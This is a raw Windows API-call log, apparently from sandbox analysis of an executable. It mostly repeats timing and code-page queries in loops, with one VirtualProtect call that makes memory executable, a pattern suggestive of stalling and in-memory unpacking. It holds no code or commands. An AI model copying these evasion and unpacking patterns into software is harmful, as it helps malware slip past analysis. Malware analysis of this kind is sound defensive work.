GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.257] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.257] GetACP () returned 0x4e4 [0081.257] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.257] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.257] GetACP () returned 0x4e4 [0081.257] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.257] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.257] GetACP () returned 0x4e4 [0081.257] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.257] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.257] GetACP () returned 0x4e4 [0081.257] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.257] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.257] GetACP () returned 0x4e4 [0081.257] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.257] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.257] GetACP () returned 0x4e4 [0081.257] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.258] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.258] GetACP () returned 0x4e4 [0081.258] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.258] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.258] GetACP () returned 0x4e4 [0081.258] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.258] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.258] GetACP () returned 0x4e4 [0081.258] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.258] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.258] GetACP () returned 0x4e4 [0081.258] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.258] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.258] GetACP () returned 0x4e4 [0081.258] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.258] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.258] GetACP () returned 0x4e4 [0081.258] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.259] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.259] GetACP () returned 0x4e4 [0081.259] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.259] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.259] GetACP () returned 0x4e4 [0081.259] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.259] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.259] GetACP () returned 0x4e4 [0081.259] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.259] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.259] GetACP () returned 0x4e4 [0081.259] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.260] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.260] GetACP () returned 0x4e4 [0081.260] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.260] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.260] GetACP () returned 0x4e4 [0081.260] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.260] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.260] GetACP () returned 0x4e4 [0081.260] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.260] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.260] GetACP () returned 0x4e4 [0081.260] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.261] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.261] GetACP () returned 0x4e4 [0081.261] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.261] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.261] GetACP () returned 0x4e4 [0081.261] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.261] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.261] GetACP () returned 0x4e4 [0081.261] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.261] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.261] GetACP () returned 0x4e4 [0081.261] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.261] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.261] GetACP () returned 0x4e4 [0081.262] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.262] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.262] GetACP () returned 0x4e4 [0081.262] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.262] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.262] GetACP () returned 0x4e4 [0081.262] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.262] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.262] GetACP () returned 0x4e4 [0081.262] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.263] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.263] GetACP () returned 0x4e4 [0081.263] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.263] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.263] GetACP () returned 0x4e4 [0081.263] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.263] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.263] GetACP () returned 0x4e4 [0081.263] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.263] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.263] GetACP () returned 0x4e4 [0081.263] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.264] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.264] GetACP () returned 0x4e4 [0081.264] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.264] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.264] GetACP () returned 0x4e4 [0081.264] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.264] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.264] GetACP () returned 0x4e4 [0081.264] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.264] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.264] GetACP () returned 0x4e4 [0081.264] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.265] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.265] GetACP () returned 0x4e4 [0081.265] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.265] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.265] GetACP () returned 0x4e4 [0081.265] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.265] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.265] GetACP () returned 0x4e4 [0081.265] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.265] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.265] GetACP () returned 0x4e4 [0081.265] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.265] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.265] GetACP () returned 0x4e4 [0081.265] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.265] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.265] GetACP () returned 0x4e4 [0081.265] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.266] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.266] GetACP () returned 0x4e4 [0081.266] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.266] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.266] GetACP () returned 0x4e4 [0081.266] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.266] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.266] GetACP () returned 0x4e4 [0081.266] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.266] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.266] GetACP () returned 0x4e4 [0081.266] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.266] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.266] GetACP () returned 0x4e4 [0081.267] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.267] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.267] GetACP () returned 0x4e4 [0081.267] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.267] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.267] GetACP () returned 0x4e4 [0081.267] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.267] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.267] GetACP () returned 0x4e4 [0081.267] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.267] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.267] GetACP () returned 0x4e4 [0081.267] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.268] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.268] GetACP () returned 0x4e4 [0081.268] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.268] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.268] GetACP () returned 0x4e4 [0081.268] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.268] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.268] GetACP () returned 0x4e4 [0081.268] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.268] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.268] GetACP () returned 0x4e4 [0081.393] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.393] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.393] GetACP () returned 0x4e4 [0081.393] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.393] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.393] GetACP () returned 0x4e4 [0081.393] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.393] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.394] GetACP () returned 0x4e4 [0081.394] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.394] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.394] GetACP () returned 0x4e4 [0081.394] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.394] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.394] GetACP () returned 0x4e4 [0081.745] VirtualProtect (in: lpAddress=0x615aa8, dwSize=0xfacb, flNewProtect=0x40, lpflOldProtect=0x43bc04 | out: lpflOldProtect=0x43bc04*=0x4) returned 1 [0082.018] AddAtomA (lpString=0x0) returned 0x0 [0082.018] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.018] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.018] AddAtomA (lpString=0x0) returned 0x0 [0082.018] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.018] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.018] AddAtomA (lpString=0x0) returned 0x0 [0082.018] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.018] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.018] AddAtomA (lpString=0x0) returned 0x0 [0082.018] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.018] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.018] AddAtomA (lpString=0x0) returned 0x0 [0082.018] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.018] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.019] AddAtomA (lpString=0x0) returned 0x0 [0082.019] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.019] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.019] AddAtomA (lpString=0x0) returned 0x0 [0082.019] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.019] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.019] AddAtomA (lpString=0x0) returned 0x0 [0082.019] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.019] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.019] AddAtomA (lpString=0x0) returned 0x0 [0082.019] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.019] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.019] AddAtomA (lpString=0x0) returned 0x0 [0082.019] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.019] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.019] AddAtomA (lpString=0x0) returned 0x0 [0082.019] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.019] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.019] AddAtomA (lpString=0x0) returned 0x0 [0082.019] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.019] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.019] AddAtomA (lpString=0x0) returned 0x0 [0082.019] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.019] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.019] AddAtomA (lpString=0x0) returned 0x0 [0082.020] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.020] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.020] AddAtomA (lpString=0x0) returned 0x0 [0082.020] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.020] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.020] AddAtomA (lpString=0x0) returned 0x0 [0082.020] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.020] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.020] AddAtomA (lpString=0x0) returned 0x0 [0082.020] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.020] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.020] AddAtomA (lpString=0x0) returned 0x0 [0082.020] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.020] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.020] AddAtomA (lpString=0x0) returned 0x0 [0082.020] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.020] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.020] AddAtomA (lpString=0x0) returned 0x0 [0082.020] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.020] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.020] AddAtomA (lpString=0x0) returned 0x0 [0082.020] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.021] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.021] AddAtomA (lpString=0x0) returned 0x0 [0082.021] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.021] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.021] AddAtomA (lpString=0x0) returned 0x0 [0082.021] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0082.021] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0082.021] 